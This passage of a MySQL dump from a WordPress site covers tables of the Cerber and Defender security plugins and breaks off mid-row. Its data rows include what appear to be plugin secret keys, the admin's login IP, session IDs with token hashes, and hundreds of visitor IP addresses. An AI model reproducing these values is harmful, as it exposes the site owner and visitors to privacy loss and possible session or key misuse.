  `action_id` bigint(20) unsigned NOT NULL,
  `message` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_actionscheduler_logs`
--

LOCK TABLES `wp0y_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wp0y_actionscheduler_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_cerber_files`
--

DROP TABLE IF EXISTS `wp0y_cerber_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_cerber_files` (
  `scan_id` int(10) unsigned NOT NULL,
  `scan_type` int(10) unsigned NOT NULL DEFAULT 1,
  `scan_mode` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_step` int(10) unsigned NOT NULL DEFAULT 0,
  `scan_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_status` int(10) unsigned NOT NULL DEFAULT 0,
  `file_name_hash` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '',
  `file_name` text NOT NULL,
  `file_type` int(10) unsigned NOT NULL DEFAULT 0,
  `file_hash` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '',
  `file_md5` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '',
  `file_hash_repo` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '',
  `hash_match` int(10) unsigned NOT NULL DEFAULT 0,
  `file_size` bigint(20) unsigned NOT NULL DEFAULT 0,
  `file_perms` int(11) NOT NULL DEFAULT 0,
  `file_writable` int(10) unsigned NOT NULL DEFAULT 0,
  `file_mtime` int(10) unsigned NOT NULL DEFAULT 0,
  `file_ext` varchar(255) NOT NULL DEFAULT '',
  `extra` text NOT NULL,
  PRIMARY KEY (`scan_id`,`file_name_hash`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_cerber_files`
--

LOCK TABLES `wp0y_cerber_files` WRITE;
/*!40000 ALTER TABLE `wp0y_cerber_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_cerber_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_cerber_sets`
--

DROP TABLE IF EXISTS `wp0y_cerber_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_cerber_sets` (
  `the_key` varchar(255) CHARACTER SET ascii NOT NULL,
  `the_id` bigint(20) NOT NULL DEFAULT 0,
  `the_value` longtext NOT NULL,
  `expires` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`the_key`,`the_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_cerber_sets`
--

LOCK TABLES `wp0y_cerber_sets` WRITE;
/*!40000 ALTER TABLE `wp0y_cerber_sets` DISABLE KEYS */;
INSERT INTO `wp0y_cerber_sets` VALUES ('_background_tasks',0,'a:0:{}',0),('_cerberkey_',0,'a:3:{i:0;s:32:\"b283a6abecea1e50ebc41fbf98331c8b\";i:1;i:1661214478;i:4;s:40:\"SK//RWS3MQ8EN1PDOI7AFL6KT29CB0YZGH5UXVJ4\";}',0),('garbage_collector',0,'1666307344',0),('admin_notice',0,'a:0:{}',0),('admin_message',0,'a:0:{}',0),('cerber_admin_wide',0,'',0),('_cerber_mnemosyne',0,'a:3:{i:3;s:19:\"Y432W59QPBSJE0NAFVZ\";i:4;i:9;i:9;s:16:\"A5JWT3O9RHYUK0QM\";}',0),('refresh_add_on_list',0,'0',0),('boot_cerber_addons',0,'a:0:{}',0),('cerber_user',1,'a:2:{s:10:\"last_login\";a:2:{s:2:\"ip\";s:14:\"130.44.228.161\";s:2:\"ua\";s:40:\"b8c457fa3cb237c79fab2c599d53520b93a929e6\";}s:11:\"2fa_history\";a:2:{i:0;i:6;i:1;i:1661358509;}}',0),('_cerber_last_send',0,'a:1:{s:5:\"email\";i:1665998032;}',0);
/*!40000 ALTER TABLE `wp0y_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_cerber_uss`
--

DROP TABLE IF EXISTS `wp0y_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii NOT NULL,
  `country` char(3) CHARACTER SET ascii NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_cerber_uss`
--

LOCK TABLES `wp0y_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wp0y_cerber_uss` DISABLE KEYS */;
INSERT INTO `wp0y_cerber_uss` VALUES (1,'43.224.0.131','',1661150249,1662359849,'','c8e0633d503922b1a220aa86bee816272bb93435b689444f7dd9e1884bb44e2c'),(1,'130.44.228.161','',1661358509,1661531309,'f6AzBDglvbNTysCIVnU4P9ZM','52f113652e05d7bcd20269bd0c706ea9353750290a927fbc2f2fdfe079cea22a'),(1,'130.44.228.161','',1661358530,1661531330,'9PGdKBnq1QOCrEwAHk7TyNuX','00f0e2fe50672235939e3446efdc49a4d42226a294a7954faaa864ca7002da90'),(1,'130.44.228.161','',1661358669,1661531469,'eRrpsbXZAciJ5U0kL67xtjd9','3ef9fa787d8a9d15fb3f1f6616feaeaee2996a2e1fc63ef06e6aa2ba1ae46402'),(1,'130.44.228.161','',1661359111,1661531911,'bh85enaqMRHI47YtX2ON6dWj','e8b20e0993e6c4751d2431376a700fa268fd4ed636b124000afed18c1c8f8761'),(1,'130.44.228.161','',1661359163,1661531963,'g9UQXEyoPGRZm1kTSIufjwNC','ffbd390d0acca1215f50c1a570232ede6ca48c0a5e5cc041f451c4984b03c943');
/*!40000 ALTER TABLE `wp0y_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_commentmeta`
--

DROP TABLE IF EXISTS `wp0y_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_commentmeta`
--

LOCK TABLES `wp0y_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp0y_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_comments`
--

DROP TABLE IF EXISTS `wp0y_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_comments`
--

LOCK TABLES `wp0y_comments` WRITE;
/*!40000 ALTER TABLE `wp0y_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_defender_audit_log`
--

DROP TABLE IF EXISTS `wp0y_defender_audit_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_defender_audit_log` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` int(11) NOT NULL,
  `event_type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `action_type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `site_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` int(11) NOT NULL,
  `context` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `ip` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `msg` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `blog_id` int(11) NOT NULL,
  `synced` int(11) NOT NULL,
  `ttl` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `event_type` (`event_type`(250)),
  KEY `action_type` (`action_type`(250)),
  KEY `user_id` (`user_id`),
  KEY `context` (`context`(250)),
  KEY `ip` (`ip`(250))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_defender_audit_log`
--

LOCK TABLES `wp0y_defender_audit_log` WRITE;
/*!40000 ALTER TABLE `wp0y_defender_audit_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_defender_audit_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_defender_email_log`
--

DROP TABLE IF EXISTS `wp0y_defender_email_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_defender_email_log` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` int(11) NOT NULL,
  `source` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `to` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `source` (`source`(250))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_defender_email_log`
--

LOCK TABLES `wp0y_defender_email_log` WRITE;
/*!40000 ALTER TABLE `wp0y_defender_email_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_defender_email_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_defender_lockout`
--

DROP TABLE IF EXISTS `wp0y_defender_lockout`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_defender_lockout` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `status` varchar(16) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `lockout_message` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `release_time` int(11) DEFAULT NULL,
  `lock_time` int(11) DEFAULT NULL,
  `lock_time_404` int(11) DEFAULT NULL,
  `attempt` int(11) DEFAULT NULL,
  `attempt_404` int(11) DEFAULT NULL,
  `meta` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `ip` (`ip`(250)),
  KEY `status` (`status`),
  KEY `attempt` (`attempt`),
  KEY `attempt_404` (`attempt_404`)
) ENGINE=MyISAM AUTO_INCREMENT=4512 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_defender_lockout`
--

LOCK TABLES `wp0y_defender_lockout` WRITE;
/*!40000 ALTER TABLE `wp0y_defender_lockout` DISABLE KEYS */;
INSERT INTO `wp0y_defender_lockout` VALUES (1,'130.44.228.161','normal','',0,0,0,0,0,'[]'),(2,'173.247.254.179','normal','',0,0,0,0,0,'[]'),(3,'213.151.33.40','normal','',0,0,0,0,0,'[]'),(4,'185.2.4.50','normal','',0,0,0,0,0,'[]'),(5,'51.89.153.42','normal','',0,0,0,0,0,'[]'),(6,'103.178.175.23','normal','',0,0,0,0,0,'[]'),(7,'165.22.202.216','normal','',0,0,0,0,0,'[]'),(8,'85.95.238.131','normal','',0,0,0,0,0,'[]'),(9,'108.171.195.134','normal','',0,0,0,0,0,'[]'),(10,'178.128.79.172','normal','',0,0,0,0,0,'[]'),(11,'157.245.65.78','normal','',0,0,0,0,0,'[]'),(12,'62.109.150.204','normal','',0,0,0,0,0,'[]'),(13,'51.77.52.109','normal','',0,0,0,0,0,'[]'),(14,'72.167.34.14','normal','',0,0,0,0,0,'[]'),(15,'64.124.8.57','normal','',0,0,0,0,0,'[]'),(16,'144.126.223.177','normal','',0,0,0,0,0,'[]'),(17,'157.55.39.230','normal','',0,0,0,0,0,'[]'),(18,'159.203.143.36','normal','',0,0,0,0,0,'[]'),(19,'40.77.167.60','normal','',0,0,0,0,0,'[]'),(20,'81.88.52.8','normal','',0,0,0,0,0,'[]'),(21,'69.167.168.99','normal','',0,0,0,0,0,'[]'),(22,'213.159.34.50','normal','',0,0,0,0,0,'[]'),(23,'200.58.118.48','normal','',0,0,0,0,0,'[]'),(24,'185.157.208.68','normal','',0,0,0,0,0,'[]'),(25,'23.99.229.218','normal','',0,0,0,0,0,'[]'),(26,'139.59.150.45','normal','',0,0,0,0,0,'[]'),(27,'114.119.145.183','normal','',0,0,0,0,0,'[]'),(28,'68.178.145.192','normal','',0,0,0,0,0,'[]'),(29,'125.227.127.195','normal','',0,0,0,0,0,'[]'),(30,'159.203.5.205','normal','',0,0,0,0,0,'[]'),(31,'5.9.193.65','normal','',0,0,0,0,0,'[]'),(32,'159.253.33.92','normal','',0,0,0,0,0,'[]'),(33,'52.29.252.113','normal','',0,0,0,0,0,'[]'),(34,'173.248.142.114','normal','',0,0,0,0,0,'[]'),(35,'51.83.96.160','normal','',0,0,0,0,0,'[]'),(36,'114.35.55.11','normal','',0,0,0,0,0,'[]'),(37,'85.91.237.106','normal','',0,0,0,0,0,'[]'),(38,'202.29.236.140','normal','',0,0,0,0,0,'[]'),(39,'194.38.20.161','normal','',0,0,0,0,0,'[]'),(40,'159.89.228.214','normal','',0,0,0,0,0,'[]'),(41,'198.46.81.55','normal','',0,0,0,0,0,'[]'),(42,'104.248.144.120','normal','',0,0,0,0,0,'[]'),(43,'82.165.87.103','normal','',0,0,0,0,0,'[]'),(44,'164.92.252.182','normal','',0,0,0,0,0,'[]'),(45,'93.115.79.153','normal','',0,0,0,0,0,'[]'),(46,'167.71.236.136','normal','',0,0,0,0,0,'[]'),(47,'104.243.37.207','normal','',0,0,0,0,0,'[]'),(48,'67.205.39.9','normal','',0,0,0,0,0,'[]'),(49,'213.152.162.149','normal','',0,0,0,0,0,'[]'),(50,'192.99.9.92','normal','',0,0,0,0,0,'[]'),(51,'165.232.180.174','normal','',0,0,0,0,0,'[]'),(52,'89.163.225.88','normal','',0,0,0,0,0,'[]'),(53,'103.77.162.18','normal','',0,0,0,0,0,'[]'),(54,'39.103.238.46','normal','',0,0,0,0,0,'[]'),(55,'51.195.104.87','normal','',0,0,0,0,0,'[]'),(56,'18.193.226.78','normal','',0,0,0,0,0,'[]'),(57,'192.99.35.126','normal','',0,0,0,0,0,'[]'),(58,'188.166.37.177','normal','',0,0,0,0,0,'[]'),(59,'114.119.154.65','normal','',0,0,0,0,0,'[]'),(60,'13.79.17.158','normal','',0,0,0,0,0,'[]'),(61,'34.65.234.0','normal','',0,0,0,0,0,'[]'),(62,'77.68.22.144','normal','',0,0,0,0,0,'[]'),(63,'138.68.80.51','normal','',0,0,0,0,0,'[]'),(64,'74.208.58.14','normal','',0,0,0,0,0,'[]'),(65,'143.244.137.11','normal','',0,0,0,0,0,'[]'),(66,'208.113.180.18','normal','',0,0,0,0,0,'[]'),(67,'149.154.161.233','normal','',0,0,0,0,0,'[]'),(68,'46.63.80.162','normal','',0,0,0,0,0,'[]'),(69,'143.244.155.35','normal','',0,0,0,0,0,'[]'),(70,'207.46.13.62','normal','',0,0,0,0,0,'[]'),(71,'147.135.255.8','normal','',0,0,0,0,0,'[]'),(72,'11.27.158.82','normal','',0,0,0,0,0,'[]'),(73,'61.19.35.42','normal','',0,0,0,0,0,'[]'),(74,'134.209.184.76','normal','',0,0,0,0,0,'[]'),(75,'79.110.52.150','normal','',0,0,0,0,0,'[]'),(76,'143.198.161.92','normal','',0,0,0,0,0,'[]'),(77,'178.18.139.195','normal','',0,0,0,0,0,'[]'),(78,'51.178.146.199','normal','',0,0,0,0,0,'[]'),(79,'43.254.18.8','normal','',0,0,0,0,0,'[]'),(80,'82.165.80.108','normal','',0,0,0,0,0,'[]'),(81,'93.119.11.71','normal','',0,0,0,0,0,'[]'),(82,'136.243.177.239','normal','',0,0,0,0,0,'[]'),(83,'157.245.158.56','normal','',0,0,0,0,0,'[]'),(84,'13.236.151.117','normal','',0,0,0,0,0,'[]'),(85,'103.31.249.221','normal','',0,0,0,0,0,'[]'),(86,'157.55.39.95','normal','',0,0,0,0,0,'[]'),(87,'91.207.57.115','normal','',0,0,0,0,0,'[]'),(88,'193.201.82.102','normal','',0,0,0,0,0,'[]'),(89,'103.199.18.41','normal','',0,0,0,0,0,'[]'),(90,'91.205.106.237','normal','',0,0,0,0,0,'[]'),(91,'46.101.89.32','normal','',0,0,0,0,0,'[]'),(92,'185.190.117.89','normal','',0,0,0,0,0,'[]'),(93,'36.94.142.166','normal','',0,0,0,0,0,'[]'),(94,'95.81.81.195','normal','',0,0,0,0,0,'[]'),(95,'89.161.159.55','normal','',0,0,0,0,0,'[]'),(96,'82.165.88.117','normal','',0,0,0,0,0,'[]'),(97,'185.2.4.33','normal','',0,0,0,0,0,'[]'),(98,'106.52.120.186','normal','',0,0,0,0,0,'[]'),(99,'103.200.23.120','normal','',0,0,0,0,0,'[]'),(100,'62.108.32.136','normal','',0,0,0,0,0,'[]'),(101,'34.172.131.247','normal','',0,0,0,0,0,'[]'),(102,'128.199.14.4','normal','',0,0,0,0,0,'[]'),(103,'40.77.167.13','normal','',0,0,0,0,0,'[]'),(104,'51.222.253.8','normal','',0,0,0,0,0,'[]'),(105,'51.222.253.17','normal','',0,0,0,0,0,'[]'),(106,'51.222.253.10','normal','',0,0,0,0,0,'[]'),(107,'51.222.253.1','normal','',0,0,0,0,0,'[]'),(108,'51.222.253.15','normal','',0,0,0,0,0,'[]'),(109,'51.222.253.9','normal','',0,0,0,0,0,'[]'),(110,'51.222.253.11','normal','',0,0,0,0,0,'[]'),(111,'51.222.253.19','normal','',0,0,0,0,0,'[]'),(112,'51.222.253.13','normal','',0,0,0,0,0,'[]'),(113,'51.222.253.6','normal','',0,0,0,0,0,'[]'),(114,'51.222.253.4','normal','',0,0,0,0,0,'[]'),(115,'51.91.220.143','normal','',0,0,0,0,0,'[]'),(116,'97.74.89.166','normal','',0,0,0,0,0,'[]'),(117,'66.249.68.45','normal','',0,0,0,0,0,'[]'),(118,'138.68.90.29','normal','',0,0,0,0,0,'[]'),(119,'151.106.41.64','normal','',0,0,0,0,0,'[]'),(120,'80.237.132.121','normal','',0,0,0,0,0,'[]'),(121,'74.208.59.209','normal','',0,0,0,0,0,'[]'),(122,'74.208.59.184','normal','',0,0,0,0,0,'[]'),(123,'51.178.138.48','normal','',0,0,0,0,0,'[]'),(124,'77.222.40.113','normal','',0,0,0,0,0,'[]'),(125,'128.199.100.142','normal','',0,0,0,0,0,'[]'),(126,'51.107.184.18','normal','',0,0,0,0,0,'[]'),(127,'114.119.151.67','normal','',0,0,0,0,0,'[]'),(128,'66.249.68.43','normal','',0,0,0,0,0,'[]'),(129,'66.249.68.41','normal','',0,0,0,0,0,'[]'),(130,'115.79.139.135','normal','',0,0,0,0,0,'[]'),(131,'168.119.80.254','normal','',0,0,0,0,0,'[]'),(132,'185.169.53.16','normal','',0,0,0,0,0,'[]'),(133,'159.223.119.187','normal','',0,0,0,0,0,'[]'),(134,'89.46.109.228','normal','',0,0,0,0,0,'[]'),(135,'165.22.223.180','normal','',0,0,0,0,0,'[]'),(136,'15.236.165.130','normal','',0,0,0,0,0,'[]'),(137,'34.134.161.50','normal','',0,0,0,0,0,'[]'),(138,'217.61.54.110','normal','',0,0,0,0,0,'[]'),(139,'64.225.65.31','normal','',0,0,0,0,0,'[]'),(140,'112.111.171.0','normal','',0,0,0,0,0,'[]'),(141,'198.199.108.46','normal','',0,0,0,0,0,'[]'),(142,'134.0.115.12','normal','',0,0,0,0,0,'[]'),(143,'50.116.43.78','normal','',0,0,0,0,0,'[]'),(144,'185.50.199.194','normal','',0,0,0,0,0,'[]'),(145,'157.245.157.141','normal','',0,0,0,0,0,'[]'),(146,'37.187.251.146','normal','',0,0,0,0,0,'[]'),(147,'185.107.112.197','normal','',0,0,0,0,0,'[]'),(148,'167.172.105.95','normal','',0,0,0,0,0,'[]'),(149,'181.174.125.214','normal','',0,0,0,0,0,'[]'),(150,'51.79.248.189','normal','',0,0,0,0,0,'[]'),(151,'212.85.99.75','normal','',0,0,0,0,0,'[]'),(152,'89.161.173.180','normal','',0,0,0,0,0,'[]'),(153,'93.186.244.149','normal','',0,0,0,0,0,'[]'),(154,'208.113.153.235','normal','',0,0,0,0,0,'[]'),(155,'120.78.15.126','normal','',0,0,0,0,0,'[]'),(156,'66.249.79.69','normal','',0,0,0,0,0,'[]'),(157,'82.166.39.15','normal','',0,0,0,0,0,'[]'),(158,'47.111.116.44','normal','',0,0,0,0,0,'[]'),(159,'213.171.202.43','normal','',0,0,0,0,0,'[]'),(160,'43.228.79.111','normal','',0,0,0,0,0,'[]'),(161,'85.95.237.64','normal','',0,0,0,0,0,'[]'),(162,'88.87.206.123','normal','',0,0,0,0,0,'[]'),(163,'205.144.100.200','normal','',0,0,0,0,0,'[]'),(164,'205.144.100.200','normal','',0,0,0,0,0,'[]'),(165,'205.144.100.200','normal','',0,0,0,0,0,'[]'),(166,'114.119.154.26','normal','',0,0,0,0,0,'[]'),(167,'209.141.34.187','normal','',0,0,0,0,0,'[]'),(168,'8.142.173.121','normal','',0,0,0,0,0,'[]'),(169,'40.88.21.235','normal','',0,0,0,0,0,'[]'),(170,'51.159.155.6','normal','',0,0,0,0,0,'[]'),(171,'209.141.41.193','normal','',0,0,0,0,0,'[]'),(172,'118.24.106.172','normal','',0,0,0,0,0,'[]'),(173,'167.71.234.124','normal','',0,0,0,0,0,'[]'),(174,'75.88.178.175','normal','',0,0,0,0,0,'[]'),(175,'139.198.14.215','normal','',0,0,0,0,0,'[]'),(176,'23.230.235.201','normal','',0,0,0,0,0,'[]'),(177,'23.230.235.225','normal','',0,0,0,0,0,'[]'),(178,'23.230.235.234','normal','',0,0,0,0,0,'[]'),(179,'23.230.235.53','normal','',0,0,0,0,0,'[]'),(180,'23.230.235.17','normal','',0,0,0,0,0,'[]'),(181,'54.36.148.153','normal','',0,0,0,0,0,'[]'),(182,'85.128.143.176','normal','',0,0,0,0,0,'[]'),(183,'216.238.101.34','normal','',0,0,0,0,0,'[]'),(184,'73.102.122.223','normal','',0,0,0,0,0,'[]'),(185,'216.244.66.235','normal','',0,0,0,0,0,'[]'),(186,'54.36.148.174','normal','',0,0,0,0,0,'[]'),(187,'51.222.253.16','normal','',0,0,0,0,0,'[]'),(188,'51.222.253.5','normal','',0,0,0,0,0,'[]'),(189,'23.230.235.244','normal','',0,0,0,0,0,'[]'),(190,'23.230.235.230','normal','',0,0,0,0,0,'[]'),(191,'23.230.235.183','normal','',0,0,0,0,0,'[]'),(192,'23.230.235.167','normal','',0,0,0,0,0,'[]'),(193,'23.230.235.42','normal','',0,0,0,0,0,'[]'),(194,'23.230.235.3','normal','',0,0,0,0,0,'[]'),(195,'23.230.235.47','normal','',0,0,0,0,0,'[]'),(196,'51.222.253.12','normal','',0,0,0,0,0,'[]'),(197,'40.77.167.103','normal','',0,0,0,0,0,'[]'),(198,'51.222.253.2','normal','',0,0,0,0,0,'[]'),(199,'114.119.154.5','normal','',0,0,0,0,0,'[]'),(200,'136.243.228.197','normal','',0,0,0,0,0,'[]'),(201,'212.119.44.233','normal','',0,0,0,0,0,'[]'),(202,'199.62.61.82','normal','',0,0,0,0,0,'[]'),(203,'77.75.76.166','normal','',0,0,0,0,0,'[]'),(204,'77.75.76.162','normal','',0,0,0,0,0,'[]'),(205,'77.75.77.109','normal','',0,0,0,0,0,'[]'),(206,'19.122.235.164','normal','',0,0,0,0,0,'[]'),(207,'77.75.78.170','normal','',0,0,0,0,0,'[]'),(208,'192.99.9.25','normal','',0,0,0,0,0,'[]'),(209,'34.216.191.176','normal','',0,0,0,0,0,'[]'),(210,'52.11.233.66','normal','',0,0,0,0,0,'[]'),(211,'65.108.78.33','normal','',0,0,0,0,0,'[]'),(212,'37.120.207.25','normal','',0,0,0,0,0,'[]'),(213,'23.230.235.106','normal','',0,0,0,0,0,'[]'),(214,'23.230.235.56','normal','',0,0,0,0,0,'[]'),(215,'23.230.235.208','normal','',0,0,0,0,0,'[]'),(216,'23.230.235.25','normal','',0,0,0,0,0,'[]'),(217,'23.230.235.16','normal','',0,0,0,0,0,'[]'),(218,'23.230.235.25','normal','',0,0,0,0,0,'[]'),(219,'23.230.235.180','normal','',0,0,0,0,0,'[]'),(220,'23.230.235.24','normal','',0,0,0,0,0,'[]'),(221,'51.222.253.14','normal','',0,0,0,0,0,'[]'),(222,'69.30.242.186','normal','',0,0,0,0,0,'[]'),(223,'65.108.40.25','normal','',0,0,0,0,0,'[]'),(224,'46.3.197.7','normal','',0,0,0,0,0,'[]'),(225,'141.95.33.140','normal','',0,0,0,0,0,'[]'),(226,'114.119.154.67','normal','',0,0,0,0,0,'[]'),(227,'107.174.40.25','normal','',0,0,0,0,0,'[]'),(228,'107.174.40.25','normal','',0,0,0,0,0,'[]'),(229,'208.67.106.91','normal','',0,0,0,0,0,'[]'),(230,'171.22.30.251','normal','',0,0,0,0,0,'[]'),(231,'137.226.113.44','normal','',0,0,0,0,0,'[]'),(232,'54.36.149.89','normal','',0,0,0,0,0,'[]'),(233,'185.174.101.105','normal','',0,0,0,0,0,'[]'),(234,'65.183.171.35','normal','',0,0,0,0,0,'[]'),(235,'65.183.171.35','normal','',0,0,0,0,0,'[]'),(236,'65.183.171.35','normal','',0,0,0,0,0,'[]'),(237,'66.249.66.129','normal','',0,0,0,0,0,'[]'),(238,'65.183.171.35','normal','',0,0,0,0,0,'[]'),(239,'6.176.182.224','normal','',0,0,0,0,0,'[]'),(240,'158.69.124.236','normal','',0,0,0,0,0,'[]'),(241,'20.232.15.218','normal','',0,0,0,0,0,'[]'),(242,'114.119.133.250','normal','',0,0,0,0,0,'[]'),(243,'114.119.144.176','normal','',0,0,0,0,0,'[]'),(244,'34.141.199.188','normal','',0,0,0,0,0,'[]'),(245,'93.158.161.33','normal','',0,0,0,0,0,'[]'),(246,'66.249.66.84','normal','',0,0,0,0,0,'[]'),(247,'34.90.108.152','normal','',0,0,0,0,0,'[]'),(248,'77.88.5.26','normal','',0,0,0,0,0,'[]'),(249,'77.88.5.229','normal','',0,0,0,0,0,'[]'),(250,'77.88.5.35','normal','',0,0,0,0,0,'[]'),(251,'209.141.55.120','normal','',0,0,0,0,0,'[]'),(252,'51.222.253.18','normal','',0,0,0,0,0,'[]'),(253,'172.255.48.132','normal','',0,0,0,0,0,'[]'),(254,'172.255.48.141','normal','',0,0,0,0,0,'[]'),(255,'172.255.